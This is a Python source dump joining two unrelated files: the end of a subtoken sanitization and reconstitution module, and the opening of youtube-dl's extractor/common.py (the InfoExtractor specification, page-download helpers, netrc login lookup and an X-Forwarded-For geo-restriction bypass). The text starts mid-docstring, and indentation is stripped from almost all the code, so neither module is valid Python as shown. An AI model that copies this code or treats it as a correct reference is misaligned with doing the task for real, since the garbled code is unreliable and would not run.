strings. It is assumed to have been checked by `check_mappings`.
sentinel: The sentinel character. It is expected to be one of the keys
in `sanitization_mapping`.
Returns:
A list of flattened subtokens representing the entire original sequence.
Raises:
ValueError: If one of the input sublists is empty, or the entire input
is empty, or the sentinel is not one of the unsanitary characters.
"""
sanitized = sanitize_subtoken_lists(subtoken_lists, sanitization_mapping,
sentinel)
flattened = flatten_subtoken_lists(sanitized)
return flattened
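

# End-to-end sketch with a hypothetical mapping and sentinel '^': each inner
# list is one original token split into pieces, so every piece except the
# last of each list receives the sentinel before flattening. A real mapping
# must satisfy the invariants documented in check_mappings below.
def _demo_flatten_and_sanitize():
  demo_mappings = {'^': 'CARET'}  # hypothetical, for illustration
  result = flatten_and_sanitize_subtoken_lists(
      [['bc', 'd'], ['e']], demo_mappings, '^')
  assert result == ['bc^', 'd', 'e']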
def reconstitute_full_unsanitary_tokens(
split_token_list,
sanitization_mapping,
sentinel):
"""Unsplits tokens previously subtokenized and flattened.
It assumes this is the output of `split_agnostic_tokens`, followed by
`sanitize_subtoken_lists` and `flatten_subtoken_lists`.
Split tokens are joined together. `['bc^', 'd']` will become
`'bcd'`, where '^' is `SENTINEL` that indicates where joining occurs.
Args:
split_token_list: List of split tokens.
sanitization_mapping: A mapping from sensitive characters to replacement
strings. It is assumed to have been checked by `check_mappings`.
sentinel: The sentinel character. It is expected to be one of the keys
in `sanitization_mapping`.
Returns:
Sequence of whole tokens.
Raises:
ValueError: if the sentinel character appears in any position other than
the sentinel position, or if any of the unsanitary characters (as per
the `sanitization_mapping`) appear anywhere, or if a subtoken is empty,
or the sentinel is not one of the unsanitary characters.
"""
if not split_token_list:
    raise ValueError('Received empty input %r but expected it to be '
                     'non-empty.' % split_token_list)
if sentinel not in sanitization_mapping:
raise ValueError('Sentinel %r should be in the sanitization map %r '
'but is not.' % (sentinel, sanitization_mapping))
whole_token_list = [] # type: List[Text]
pending_split_tokens = [] # type: List[Text]
for t in split_token_list:
if not t:
raise ValueError('Must have non-empty subtokens, but found %r in %r.' % (
t, split_token_list))
if t[-1] == sentinel:
# Remove sentinel and accumulate until the final one appears.
pending_split_tokens.append(t[:-1])
else:
# It is a final token, so combine everything accumulated into one.
pending_split_tokens.append(t)
whole_token = ''.join(pending_split_tokens)
whole_token_list.append(whole_token)
pending_split_tokens = []
# We should have nothing pending.
if pending_split_tokens:
raise ValueError('After scanning all subtokens %r, there still is some '
'unjoined content: %r' %
(split_token_list, pending_split_tokens))
# At this point we have whole tokens that contain sanitized characters. First
# we'll see if they are dirty, and then unsanitize them into their original
# form.
unsanitary_characters = sanitization_mapping.keys()
for whole_token in whole_token_list:
for unsanitary_character in unsanitary_characters:
if unsanitary_character in whole_token:
raise ValueError('Reconstructed whole token %r seems to contain a '
'character %r that should have been sanitized '
'already.' % (whole_token, unsanitary_character))
# Unsanitize.
unsanitized_whole_tokens = [
unsanitize(t, sanitization_mapping) for t in whole_token_list
]
return unsanitized_whole_tokens
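

# Inverse of the flattening sketch above (same hypothetical mapping and
# sentinel): subtokens carrying the trailing sentinel are glued to their
# successors to reconstitute the whole tokens.
def _demo_reconstitute():
  demo_mappings = {'^': 'CARET'}  # hypothetical, for illustration
  assert reconstitute_full_unsanitary_tokens(
      ['bc^', 'd', 'e'], demo_mappings, '^') == ['bcd', 'e']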
def check_mappings(mappings):
"""Checks the correctness of character-to-string sanitization mappings.
This ensures that all keys are single characters and that no value contains
any of the keys or other values.
Args:
mappings: A mapping from characters to strings.
Raises:
ValueError: If a key has length different from 1 or if a key appears in any
value or if a value is a substring of another value, or if any value is
empty or non-unique.
"""
for key in mappings:
if len(key) != 1:
raise ValueError('Expecting length-1 strings as keys in mappings, but '
'got key %r in mappings %r.' % (key, mappings))
values = mappings.values()
if len(values) != len(set(values)):
raise ValueError('There seem to be some duplicate values in %r, but they '
'are expected to be unique.' % mappings)
if any([not value for value in values]):
raise ValueError('An empty value found in %r, but no empty values are '
'allowed.' % mappings)
for value in values:
for other_value in values:
if value != other_value and value in other_value:
raise ValueError('Value %r is a substring of %r, but no value may '
'be a substring of another.' % (value, other_value))
for key in mappings:
if key in value:
raise ValueError('No key may appear in one of the mapping values, but '
'found key %r in value %r, both of which appear in '
'the mappings %r.' % (key, value, mappings))
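

# A mapping that passes check_mappings (hypothetical values): keys are single
# characters, values are unique and non-empty, and no value contains a key or
# another value.
def _demo_check_mappings():
  check_mappings({'\n': 'NL', '\r': 'CR'})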
def subtokenize_agnostic_tokens_in_place(
agnostic_tokens,
max_output_token_length,
sanitization_mapping,
sentinel,
):
"""Subtokenizes language-agnostic tokens, discarding their kind in the end.
Args:
agnostic_tokens: The language-agnostic tokens to subtokenize. These are
pairs of spelling and generic token kind. No subtokenization has been
done; the tokens are as the language-specific lexer produced them.
max_output_token_length: The target maximum output token length.
sanitization_mapping: A mapping from sensitive characters to replacement
strings. It is assumed to have been checked by `check_mappings`.
sentinel: The sentinel character. It is expected to be one of the keys
in `sanitization_mapping`.
Returns:
A list of subtoken lists, one per original agnostic token.
"""
labelled_subtokenized = split_agnostic_tokens(agnostic_tokens,
max_output_token_length)
unlabelled_subtokenized = [
t.spellings for t in labelled_subtokenized
]
subtoken_lists = sanitize_subtoken_lists(unlabelled_subtokenized,
sanitization_mapping,
sentinel)
return subtoken_lists


# youtube_dl/extractor/common.py (from rg3/youtube-dl)
from __future__ import unicode_literals
import base64
import datetime
import hashlib
import json
import netrc
import os
import random
import re
import socket
import sys
import time
import math
from ..compat import (
compat_cookiejar,
compat_cookies,
compat_etree_fromstring,
compat_getpass,
compat_http_client,
compat_os_name,
compat_str,
compat_urllib_error,
compat_urllib_parse_unquote,
compat_urllib_parse_urlencode,
compat_urllib_request,
compat_urlparse,
)
from ..downloader.f4m import remove_encrypted_media
from ..utils import (
NO_DEFAULT,
age_restricted,
base_url,
bug_reports_message,
clean_html,
compiled_regex_type,
determine_ext,
error_to_compat_str,
ExtractorError,
fix_xml_ampersands,
float_or_none,
GeoRestrictedError,
GeoUtils,
int_or_none,
js_to_json,
parse_iso8601,
RegexNotFoundError,
sanitize_filename,
sanitized_Request,
unescapeHTML,
unified_strdate,
unified_timestamp,
url_basename,
xpath_element,
xpath_text,
xpath_with_ns,
determine_protocol,
parse_duration,
mimetype2ext,
update_Request,
update_url_query,
parse_m3u8_attributes,
extract_attributes,
parse_codecs,
urljoin,
)
class InfoExtractor(object):
"""Information Extractor class.
Information extractors are the classes that, given a URL, extract
information about the video (or videos) the URL refers to. This
information includes the real video URL, the video title, author and
others. The information is stored in a dictionary which is then
passed to the YoutubeDL. The YoutubeDL processes this
information possibly downloading the video to the file system, among
other possible outcomes.
The type field determines the type of the result.
By far the most common value (and the default if _type is missing) is
"video", which indicates a single video.
For a video, the dictionaries must include the following fields:
id: Video identifier.
title: Video title, unescaped.
Additionally, it must contain either a formats entry or a url one:
formats: A list of dictionaries for each format available, ordered
from worst to best quality.
Potential fields:
* url Mandatory. The URL of the video file
* manifest_url
The URL of the manifest file in case of
fragmented media (DASH, hls, hds)
* ext Will be calculated from URL if missing
* format A human-readable description of the format
("mp4 container with h264/opus").
Calculated from the format_id, width, height.
and format_note fields if missing.
* format_id A short description of the format
("mp4_h264_opus" or "19").
Technically optional, but strongly recommended.
* format_note Additional info about the format
("3D" or "DASH video")
* width Width of the video, if known
* height Height of the video, if known
* resolution Textual description of width and height
* tbr Average bitrate of audio and video in KBit/s
* abr Average audio bitrate in KBit/s
* acodec Name of the audio codec in use
* asr Audio sampling rate in Hertz
* vbr Average video bitrate in KBit/s
* fps Frame rate
* vcodec Name of the video codec in use
* container Name of the container format
* filesize The number of bytes, if known in advance
* filesize_approx An estimate for the number of bytes
* player_url SWF Player URL (used for rtmpdump).
* protocol The protocol that will be used for the actual
download, lower-case.
"http", "https", "rtsp", "rtmp", "rtmpe",
"m3u8", "m3u8_native" or "http_dash_segments".
* fragment_base_url
Base URL for fragments. Each fragment's path
value (if present) will be relative to
this URL.
* fragments A list of fragments of a fragmented media.
Each fragment entry must contain either an url
or a path. If an url is present it should be
considered by a client. Otherwise both path and
fragment_base_url must be present. Here is
the list of all potential fields:
* "url" - fragment's URL
* "path" - fragment's path relative to
fragment_base_url
* "duration" (optional, int or float)
* "filesize" (optional, int)
* preference Order number of this format. If this field is
present and not None, the formats get sorted
by this field, regardless of all other values.
-1 for default (order by other properties),
-2 or smaller for less than default.
< -1000 to hide the format (if there is
another one which is strictly better)
* language Language code, e.g. "de" or "en-US".
* language_preference Is this in the language mentioned in
the URL?
10 if it's what the URL is about,
-1 for default (don't know),
-10 otherwise, other values reserved for now.
* quality Order number of the video quality of this
format, irrespective of the file format.
-1 for default (order by other properties),
-2 or smaller for less than default.
* source_preference Order number for this video source
(quality takes higher priority)
-1 for default (order by other properties),
-2 or smaller for less than default.
* http_headers A dictionary of additional HTTP headers
to add to the request.
* stretched_ratio If given and not 1, indicates that the
video's pixels are not square.
width : height ratio as float.
* no_resume The server does not support resuming the
(HTTP or RTMP) download. Boolean.
url: Final video URL.
ext: Video filename extension.
format: The video format, defaults to ext (used for --get-format)
player_url: SWF Player URL (used for rtmpdump).
The following fields are optional:
alt_title: A secondary title of the video.
display_id An alternative identifier for the video, not necessarily
unique, but available before title. Typically, id is
something like "4234987", title "Dancing naked mole rats",
and display_id "dancing-naked-mole-rats"
thumbnails: A list of dictionaries, with the following entries:
* "id" (optional, string) - Thumbnail format ID
* "url"
* "preference" (optional, int) - quality of the image
* "width" (optional, int)
* "height" (optional, int)
* "resolution" (optional, string "{width}x{height"},
deprecated)
* "filesize" (optional, int)
thumbnail: Full URL to a video thumbnail image.
description: Full video description.
uploader: Full name of the video uploader.
license: License name the video is licensed under.
creator: The creator of the video.
release_date: The date (YYYYMMDD) when the video was released.
timestamp: UNIX timestamp of the moment the video became available.
upload_date: Video upload date (YYYYMMDD).
If not explicitly set, calculated from timestamp.
uploader_id: Nickname or id of the video uploader.
uploader_url: Full URL to a personal webpage of the video uploader.
location: Physical location where the video was filmed.
subtitles: The available subtitles as a dictionary in the format
{tag: subformats}. "tag" is usually a language code, and
"subformats" is a list sorted from lower to higher
preference, each element is a dictionary with the "ext"
entry and one of:
* "data": The subtitles file contents
* "url": A URL pointing to the subtitles file
"ext" will be calculated from URL if missing
automatic_captions: Like 'subtitles', used by the YoutubeIE for
automatically generated captions
duration: Length of the video in seconds, as an integer or float.
view_count: How many users have watched the video on the platform.
like_count: Number of positive ratings of the video
dislike_count: Number of negative ratings of the video
repost_count: Number of reposts of the video
    average_rating: Average rating given by users; the scale used depends on the webpage
comment_count: Number of comments on the video
comments: A list of comments, each with one or more of the following
properties (all but one of text or html optional):
* "author" - human-readable name of the comment author
* "author_id" - user ID of the comment author
* "id" - Comment ID
* "html" - Comment as HTML
* "text" - Plain text of the comment
* "timestamp" - UNIX timestamp of comment
* "parent" - ID of the comment this one is replying to.
Set to "root" to indicate that this is a
comment to the original video.
age_limit: Age restriction for the video, as an integer (years)
    webpage_url:   The URL to the video webpage; if given to youtube-dl it
                   should yield the same result again. (It will be set
                   by YoutubeDL if it's missing)
categories: A list of categories that the video falls in, for example
["Sports", "Berlin"]
tags: A list of tags assigned to the video, e.g. ["sweden", "pop music"]
is_live: True, False, or None (=unknown). Whether this video is a
live stream that goes on instead of a fixed-length video.
start_time: Time in seconds where the reproduction should start, as
specified in the URL.
end_time: Time in seconds where the reproduction should end, as
specified in the URL.
The following fields should only be used when the video belongs to some logical
chapter or section:
chapter: Name or title of the chapter the video belongs to.
chapter_number: Number of the chapter the video belongs to, as an integer.
chapter_id: Id of the chapter the video belongs to, as a unicode string.
The following fields should only be used when the video is an episode of some
series, programme or podcast:
series: Title of the series or programme the video episode belongs to.
season: Title of the season the video episode belongs to.
season_number: Number of the season the video episode belongs to, as an integer.
season_id: Id of the season the video episode belongs to, as a unicode string.
episode: Title of the video episode. Unlike mandatory video title field,
this field should denote the exact title of the video episode
without any kind of decoration.
episode_number: Number of the video episode within a season, as an integer.
episode_id: Id of the video episode, as a unicode string.
The following fields should only be used when the media is a track or a part of
a music album:
track: Title of the track.
track_number: Number of the track within an album or a disc, as an integer.
track_id: Id of the track (useful in case of custom indexing, e.g. 6.iii),
as a unicode string.
artist: Artist(s) of the track.
genre: Genre(s) of the track.
album: Title of the album the track belongs to.
album_type: Type of the album (e.g. "Demo", "Full-length", "Split", "Compilation", etc).
album_artist: List of all artists appeared on the album (e.g.
"Ash Borer / Fell Voices" or "Various Artists", useful for splits
and compilations).
disc_number: Number of the disc or other physical medium the track belongs to,
as an integer.
release_year: Year (YYYY) when the album was released.
Unless mentioned otherwise, the fields should be Unicode strings.
Unless mentioned otherwise, None is equivalent to absence of information.
_type "playlist" indicates multiple videos.
There must be a key "entries", which is a list, an iterable, or a PagedList
object, each element of which is a valid dictionary by this specification.
Additionally, playlists can have "title", "description" and "id" attributes
with the same semantics as videos (see above).
_type "multi_video" indicates that there are multiple videos that
    form a single show, for example multiple acts of an opera or TV episode.
It must have an entries key like a playlist and contain all the keys
required for a video at the same time.
_type "url" indicates that the video must be extracted from another
location, possibly by a different extractor. Its only required key is:
"url" - the next URL to extract.
The key "ie_key" can be set to the class name (minus the trailing "IE",
e.g. "Youtube") if the extractor class is known in advance.
Additionally, the dictionary may have any properties of the resolved entity
known in advance, for example "title" if the title of the referred video is
known ahead of time.
_type "url_transparent" entities have the same specification as "url", but
indicate that the given additional information is more precise than the one
associated with the resolved URL.
This is useful when a site employs a video service that hosts the video and
its technical metadata, but that video service does not embed a useful
title, description etc.
Subclasses of this one should re-define the _real_initialize() and
_real_extract() methods and define a _VALID_URL regexp.
Probably, they should also be added to the list of extractors.
_GEO_BYPASS attribute may be set to False in order to disable
geo restriction bypass mechanisms for a particular extractor.
Though it won't disable explicit geo restriction bypass based on
country code provided with geo_bypass_country. (experimental)
_GEO_COUNTRIES attribute may contain a list of presumably geo unrestricted
countries for this extractor. One of these countries will be used by
geo restriction bypass mechanism right away in order to bypass
geo restriction, of course, if the mechanism is not disabled. (experimental)
NB: both these geo attributes are experimental and may change in future
or be completely removed.
Finally, the _WORKING attribute should be set to False for broken IEs
in order to warn the users and skip the tests.
"""
_ready = False
_downloader = None
_x_forwarded_for_ip = None
_GEO_BYPASS = True
_GEO_COUNTRIES = None
_WORKING = True
def __init__(self, downloader=None):
"""Constructor. Receives an optional downloader."""
self._ready = False
self._x_forwarded_for_ip = None
self.set_downloader(downloader)
@classmethod
def suitable(cls, url):
"""Receives a URL and returns True if suitable for this IE."""
# This does not use has/getattr intentionally - we want to know whether
# we have cached the regexp for *this* class, whereas getattr would also
# match the superclass
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
return cls._VALID_URL_RE.match(url) is not None
@classmethod
def _match_id(cls, url):
if '_VALID_URL_RE' not in cls.__dict__:
cls._VALID_URL_RE = re.compile(cls._VALID_URL)
m = cls._VALID_URL_RE.match(url)
assert m
return m.group('id')
@classmethod
def working(cls):
"""Getter method for _WORKING."""
return cls._WORKING
def initialize(self):
"""Initializes an instance (authentication, etc)."""
self._initialize_geo_bypass(self._GEO_COUNTRIES)
if not self._ready:
self._real_initialize()
self._ready = True
def _initialize_geo_bypass(self, countries):
"""
Initialize geo restriction bypass mechanism.
This method is used to initialize geo bypass mechanism based on faking
X-Forwarded-For HTTP header. A random country from provided country list
is selected and a random IP belonging to this country is generated. This
IP will be passed as X-Forwarded-For HTTP header in all subsequent
HTTP requests.
This method will be used for initial geo bypass mechanism initialization
during the instance initialization with _GEO_COUNTRIES.
You may also manually call it from extractor's code if geo countries
information is not available beforehand (e.g. obtained during
        extraction) or for some other reason.
"""
if not self._x_forwarded_for_ip:
country_code = self._downloader.params.get('geo_bypass_country', None)
# If there is no explicit country for geo bypass specified and
# the extractor is known to be geo restricted let's fake IP
# as X-Forwarded-For right away.
if (not country_code and
self._GEO_BYPASS and
self._downloader.params.get('geo_bypass', True) and
countries):
country_code = random.choice(countries)
if country_code:
self._x_forwarded_for_ip = GeoUtils.random_ipv4(country_code)
if self._downloader.params.get('verbose', False):
self._downloader.to_stdout(
'[debug] Using fake IP %s (%s) as X-Forwarded-For.'
% (self._x_forwarded_for_ip, country_code.upper()))
def extract(self, url):
"""Extracts URL information and returns it in list of dicts."""
try:
for _ in range(2):
try:
self.initialize()
ie_result = self._real_extract(url)
if self._x_forwarded_for_ip:
ie_result['__x_forwarded_for_ip'] = self._x_forwarded_for_ip
return ie_result
except GeoRestrictedError as e:
if self.__maybe_fake_ip_and_retry(e.countries):
continue
raise
except ExtractorError:
raise
except compat_http_client.IncompleteRead as e:
raise ExtractorError('A network error has occurred.', cause=e, expected=True)
except (KeyError, StopIteration) as e:
raise ExtractorError('An extractor error has occurred.', cause=e)
def __maybe_fake_ip_and_retry(self, countries):
if (not self._downloader.params.get('geo_bypass_country', None) and
self._GEO_BYPASS and
self._downloader.params.get('geo_bypass', True) and
not self._x_forwarded_for_ip and
countries):
country_code = random.choice(countries)
self._x_forwarded_for_ip = GeoUtils.random_ipv4(country_code)
if self._x_forwarded_for_ip:
self.report_warning(
'Video is geo restricted. Retrying extraction with fake IP %s (%s) as X-Forwarded-For.'
% (self._x_forwarded_for_ip, country_code.upper()))
return True
return False
def set_downloader(self, downloader):
"""Sets the downloader for this IE."""
self._downloader = downloader
def _real_initialize(self):
"""Real initialization process. Redefine in subclasses."""
pass
def _real_extract(self, url):
"""Real extraction process. Redefine in subclasses."""
pass
@classmethod
def ie_key(cls):
"""A string for getting the InfoExtractor with get_info_extractor"""
return compat_str(cls.__name__[:-2])
@property
def IE_NAME(self):
return compat_str(type(self).__name__[:-2])
def _request_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True, data=None, headers={}, query={}):
""" Returns the response handle """
if note is None:
self.report_download_webpage(video_id)
elif note is not False:
if video_id is None:
self.to_screen('%s' % (note,))
else:
self.to_screen('%s: %s' % (video_id, note))
if isinstance(url_or_request, compat_urllib_request.Request):
url_or_request = update_Request(
url_or_request, data=data, headers=headers, query=query)
else:
if query:
url_or_request = update_url_query(url_or_request, query)
if data is not None or headers:
url_or_request = sanitized_Request(url_or_request, data, headers)
try:
return self._downloader.urlopen(url_or_request)
except (compat_urllib_error.URLError, compat_http_client.HTTPException, socket.error) as err:
if errnote is False:
return False
if errnote is None:
errnote = 'Unable to download webpage'
errmsg = '%s: %s' % (errnote, error_to_compat_str(err))
if fatal:
raise ExtractorError(errmsg, sys.exc_info()[2], cause=err)
else:
self._downloader.report_warning(errmsg)
return False
def _download_webpage_handle(self, url_or_request, video_id, note=None, errnote=None, fatal=True, encoding=None, data=None, headers={}, query={}):
""" Returns a tuple (page content as string, URL handle) """
# Strip hashes from the URL (#1038)
if isinstance(url_or_request, (compat_str, str)):
url_or_request = url_or_request.partition('#')[0]
# Some sites check X-Forwarded-For HTTP header in order to figure out
# the origin of the client behind proxy. This allows bypassing geo
# restriction by faking this header's value to IP that belongs to some
# geo unrestricted country. We will do so once we encounter any
# geo restriction error.
if self._x_forwarded_for_ip:
if 'X-Forwarded-For' not in headers:
headers['X-Forwarded-For'] = self._x_forwarded_for_ip
urlh = self._request_webpage(url_or_request, video_id, note, errnote, fatal, data=data, headers=headers, query=query)
if urlh is False:
assert not fatal
return False
content = self._webpage_read_content(urlh, url_or_request, video_id, note, errnote, fatal, encoding=encoding)
return (content, urlh)
@staticmethod
def _guess_encoding_from_content(content_type, webpage_bytes):
m = re.match(r'[a-zA-Z0-9_.-]+/[a-zA-Z0-9_.-]+\s*;\s*charset=(.+)', content_type)
if m:
encoding = m.group(1)
else:
m = re.search(br'<meta[^>]+charset=[\'"]?([^\'")]+)[ /\'">]',
webpage_bytes[:1024])
if m:
encoding = m.group(1).decode('ascii')
elif webpage_bytes.startswith(b'\xff\xfe'):
encoding = 'utf-16'
else:
encoding = 'utf-8'
return encoding
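
    # Examples for the sniffing order above (illustrative):
    #   Content-Type 'text/html; charset=iso-8859-1' -> 'iso-8859-1'
    #   b'<meta charset="utf-8">' in the body        -> 'utf-8'
    #   a UTF-16 LE BOM (b'\xff\xfe')                -> 'utf-16'
    #   otherwise                                    -> 'utf-8' (the default)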
def _webpage_read_content(self, urlh, url_or_request, video_id, note=None, errnote=None, fatal=True, prefix=None, encoding=None):
content_type = urlh.headers.get('Content-Type', '')
webpage_bytes = urlh.read()
if prefix is not None:
webpage_bytes = prefix + webpage_bytes
if not encoding:
encoding = self._guess_encoding_from_content(content_type, webpage_bytes)
if self._downloader.params.get('dump_intermediate_pages', False):
try:
url = url_or_request.get_full_url()
except AttributeError:
url = url_or_request
self.to_screen('Dumping request to ' + url)
dump = base64.b64encode(webpage_bytes).decode('ascii')
self._downloader.to_screen(dump)
if self._downloader.params.get('write_pages', False):
try:
url = url_or_request.get_full_url()
except AttributeError:
url = url_or_request
basen = '%s_%s' % (video_id, url)
if len(basen) > 240:
h = '___' + hashlib.md5(basen.encode('utf-8')).hexdigest()
basen = basen[:240 - len(h)] + h
raw_filename = basen + '.dump'
filename = sanitize_filename(raw_filename, restricted=True)
self.to_screen('Saving request to ' + filename)
# Working around MAX_PATH limitation on Windows (see
# http://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
if compat_os_name == 'nt':
absfilepath = os.path.abspath(filename)
if len(absfilepath) > 259:
filename = '\\\\?\\' + absfilepath
with open(filename, 'wb') as outf:
outf.write(webpage_bytes)
try:
content = webpage_bytes.decode(encoding, 'replace')
except LookupError:
content = webpage_bytes.decode('utf-8', 'replace')
if ('<title>Access to this site is blocked</title>' in content and
'Websense' in content[:512]):
msg = 'Access to this webpage has been blocked by Websense filtering software in your network.'
blocked_iframe = self._html_search_regex(
r'<iframe src="([^"]+)"', content,
'Websense information URL', default=None)
if blocked_iframe:
msg += ' Visit %s for more details' % blocked_iframe
raise ExtractorError(msg, expected=True)
if '<title>The URL you requested has been blocked</title>' in content[:512]:
msg = (
'Access to this webpage has been blocked by Indian censorship. '
'Use a VPN or proxy server (with --proxy) to route around it.')
block_msg = self._html_search_regex(
r'</h1><p>(.*?)</p>',
content, 'block message', default=None)
if block_msg:
msg += ' (Message: "%s")' % block_msg.replace('\n', ' ')
raise ExtractorError(msg, expected=True)
return content
def _download_webpage(self, url_or_request, video_id, note=None, errnote=None, fatal=True, tries=1, timeout=5, encoding=None, data=None, headers={}, query={}):
""" Returns the data of the page as a string """
success = False
try_count = 0
while success is False:
try:
res = self._download_webpage_handle(url_or_request, video_id, note, errnote, fatal, encoding=encoding, data=data, headers=headers, query=query)
success = True
except compat_http_client.IncompleteRead as e:
try_count += 1
if try_count >= tries:
raise e
self._sleep(timeout, video_id)
if res is False:
return res
else:
content, _ = res
return content
def _download_xml(self, url_or_request, video_id,
note='Downloading XML', errnote='Unable to download XML',
transform_source=None, fatal=True, encoding=None, data=None, headers={}, query={}):
"""Return the xml as an xml.etree.ElementTree.Element"""
xml_string = self._download_webpage(
url_or_request, video_id, note, errnote, fatal=fatal, encoding=encoding, data=data, headers=headers, query=query)
if xml_string is False:
return xml_string
if transform_source:
xml_string = transform_source(xml_string)
return compat_etree_fromstring(xml_string.encode('utf-8'))
def _download_json(self, url_or_request, video_id,
note='Downloading JSON metadata',
errnote='Unable to download JSON metadata',
transform_source=None,
fatal=True, encoding=None, data=None, headers={}, query={}):
json_string = self._download_webpage(
url_or_request, video_id, note, errnote, fatal=fatal,
encoding=encoding, data=data, headers=headers, query=query)
if (not fatal) and json_string is False:
return None
return self._parse_json(
json_string, video_id, transform_source=transform_source, fatal=fatal)
def _parse_json(self, json_string, video_id, transform_source=None, fatal=True):
if transform_source:
json_string = transform_source(json_string)
try:
return json.loads(json_string)
except ValueError as ve:
errmsg = '%s: Failed to parse JSON ' % video_id
if fatal:
raise ExtractorError(errmsg, cause=ve)
else:
self.report_warning(errmsg + str(ve))
def report_warning(self, msg, video_id=None):
idstr = '' if video_id is None else '%s: ' % video_id
self._downloader.report_warning(
'[%s] %s%s' % (self.IE_NAME, idstr, msg))
def to_screen(self, msg):
"""Print msg to screen, prefixing it with '[ie_name]'"""
self._downloader.to_screen('[%s] %s' % (self.IE_NAME, msg))
def report_extraction(self, id_or_name):
"""Report information extraction."""
self.to_screen('%s: Extracting information' % id_or_name)
def report_download_webpage(self, video_id):
"""Report webpage download."""
self.to_screen('%s: Downloading webpage' % video_id)
def report_age_confirmation(self):
"""Report attempt to confirm age."""
self.to_screen('Confirming age')
def report_login(self):
"""Report attempt to log in."""
self.to_screen('Logging in')
@staticmethod
def raise_login_required(msg='This video is only available for registered users'):
raise ExtractorError(
'%s. Use --username and --password or --netrc to provide account credentials.' % msg,
expected=True)
@staticmethod
def raise_geo_restricted(msg='This video is not available from your location due to geo restriction', countries=None):
raise GeoRestrictedError(msg, countries=countries)
# Methods for following #608
@staticmethod
def url_result(url, ie=None, video_id=None, video_title=None):
"""Returns a URL that points to a page that should be processed"""
# TODO: ie should be the class used for getting the info
video_info = {'_type': 'url',
'url': url,
'ie_key': ie}
if video_id is not None:
video_info['id'] = video_id
if video_title is not None:
video_info['title'] = video_title
return video_info
@staticmethod
def playlist_result(entries, playlist_id=None, playlist_title=None, playlist_description=None):
"""Returns a playlist"""
video_info = {'_type': 'playlist',
'entries': entries}
if playlist_id:
video_info['id'] = playlist_id
if playlist_title:
video_info['title'] = playlist_title
if playlist_description:
video_info['description'] = playlist_description
return video_info
def _search_regex(self, pattern, string, name, default=NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Perform a regex search on the given string, using a single or a list of
patterns returning the first matching group.
In case of failure return a default value or raise a WARNING or a
RegexNotFoundError, depending on fatal, specifying the field name.
"""
if isinstance(pattern, (str, compat_str, compiled_regex_type)):
mobj = re.search(pattern, string, flags)
else:
for p in pattern:
mobj = re.search(p, string, flags)
if mobj:
break
if not self._downloader.params.get('no_color') and compat_os_name != 'nt' and sys.stderr.isatty():
_name = '\033[0;34m%s\033[0m' % name
else:
_name = name
if mobj:
if group is None:
# return the first matching group
return next(g for g in mobj.groups() if g is not None)
else:
return mobj.group(group)
elif default is not NO_DEFAULT:
return default
elif fatal:
raise RegexNotFoundError('Unable to extract %s' % _name)
else:
self._downloader.report_warning('unable to extract %s' % _name + bug_reports_message())
return None
def _html_search_regex(self, pattern, string, name, default=NO_DEFAULT, fatal=True, flags=0, group=None):
"""
Like _search_regex, but strips HTML tags and unescapes entities.
"""
res = self._search_regex(pattern, string, name, default, fatal, flags, group)
if res:
return clean_html(res).strip()
else:
return res
def _get_netrc_login_info(self, netrc_machine=None):
username = None
password = None
netrc_machine = netrc_machine or self._NETRC_MACHINE
if self._downloader.params.get('usenetrc', False):
try:
info = netrc.netrc().authenticators(netrc_machine)
if info is not None:
username = info[0]
password = info[2]
else:
raise netrc.NetrcParseError(
'No authenticators for %s' % netrc_machine)
except (IOError, netrc.NetrcParseError) as err:
self._downloader.report_warning(
'parsing .netrc: %s' % error_to_compat_str(err))
return username, password
def _get_login_info(self, username_option='username', password_option='password', netrc_machine=None):
"""
Get the login info as (username, password)
        First look for the manually specified credentials using username_option
        and password_option as keys in the params dictionary. If no such
        credentials are available, look in the netrc file using the
        netrc_machine or _NETRC_MACHINE value.
If there's no info available, return (None, None)
"""
if self._downloader is None:
return (None, None)
downloader_params = self._downloader.params
# Attempt to use provided username and password or .netrc data
if downloader_params.get(username_option) is not None:
username = downloader_params[username_option]
password = downloader_params[password_option]
else:
username, password = self._get_netrc_login_info(netrc_machine)
return username, password
def _get_tfa_info(self, note='two-factor verification code'):
"""
Get the two-factor authentication info
TODO - asking the user will be required for sms/phone verify
currently just uses the command line option
If there's no info available, return None
"""
if self._downloader is None:
return None
downloader_params = self._downloader.params
if downloader_params.get('twofactor') is not None:
return downloader_params['twofactor']
return compat_getpass('Type %s and press [Return]: ' % note)
# Helper functions for extracting OpenGraph info
@staticmethod
def _og_regexes(prop):
content_re = r'content=(?:"([^"]+?)"|\'([^\']+?)\'|\s*([^\s"\'=<>`]+?))'
property_re = (r'(?:name|property)=(?:\'og:%(prop)s\'|"og:%(prop)s"|\s*og:%(prop)s\b)'
% {'prop': re.escape(prop)})
template = r'<meta[^>]+?%s[^>]+?%s'
return [
template % (property_re, content_re),
template % (content_re, property_re),
]
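
    # Both attribute orderings are matched by the two templates above, e.g.:
    #   <meta property="og:title" content="Some title">
    #   <meta content="Some title" property="og:title">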
@staticmethod
def _meta_regex(prop):
return r'''(?isx)<meta
(?=[^>]+(?:itemprop|name|property|id|http-equiv)=(["\']?)%s\1)
[^>]+?content=(["\'])(?P<content>.*?)\2''' % re.escape(prop)
def _og_search_property(self, prop, html, name=None, **kargs):
if not isinstance(prop, (list, tuple)):
prop = [prop]
if name is None:
name = 'OpenGraph %s' % prop[0]
og_regexes = []
for p in prop:
og_regexes.extend(self._og_regexes(p))
escaped = self._search_regex(og_regexes, html, name, flags=re.DOTALL, **kargs)
if escaped is None:
return None
return unescapeHTML(escaped)
def _og_search_thumbnail(self, html, **kargs):
return self._og_search_property('image', html, 'thumbnail URL', fatal=False, **kargs)
def _og_search_description(self, html, **kargs):
return self._og_search_property('description', html, fatal=False, **kargs)
def _og_search_title(self, html, **kargs):
return self._og_search_property('title', html, **kargs)
def _og_search_video_url(self, html, name='video url', secure=True, **kargs):
regexes = self._og_regexes('video') + self._og_regexes('video:url')
if secure:
regexes = self._og_regexes('video:secure_url') + regexes
return self._html_search_regex(regexes, html, name, **kargs)
def _og_search_url(self, html, **kargs):
return self._og_search_property('url', html, **kargs)
def _html_search_meta(self, name, html, display_name=None, fatal=False, **kwargs):
if not isinstance(name, (list, tuple)):
name = [name]
if display_name is None:
display_name = name[0]
return self._html_search_regex(
[self._meta_regex(n) for n in name],
html, display_name, fatal=fatal, group='content', **kwargs)
